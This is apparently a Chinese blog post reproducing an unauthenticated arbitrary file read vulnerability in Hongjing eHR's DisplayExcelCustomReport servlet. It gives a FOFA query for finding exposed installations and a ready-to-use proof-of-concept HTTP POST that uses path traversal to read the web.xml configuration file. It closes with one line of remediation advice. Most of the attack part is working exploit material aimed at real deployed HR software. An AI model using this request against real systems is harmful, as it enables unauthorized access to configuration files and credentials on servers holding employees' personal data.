«

宏景eHR DisplayExcelCustomReport 任意文件读取漏洞复现

站长 • 2024-02-29 04:56 • 123 次点击 • 技术文章


宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

宏景eHR DisplayExcelCustomReport接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA:app="HJSOFT-HCM"

宏景eHR DisplayExcelCustomReport 任意文件读取漏洞复现

PoC

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1Host: your-ipUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: application/x-www-form-urlencoded filename=../webapps/ROOT/WEB-INF/web.xml

读取web.xml

宏景eHR DisplayExcelCustomReport 任意文件读取漏洞复现

关闭互联网暴露面或接口设置访问权限

目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。

推荐阅读:


扫描二维码,在手机上阅读
收藏
还没收到回复
请先 登录 再回复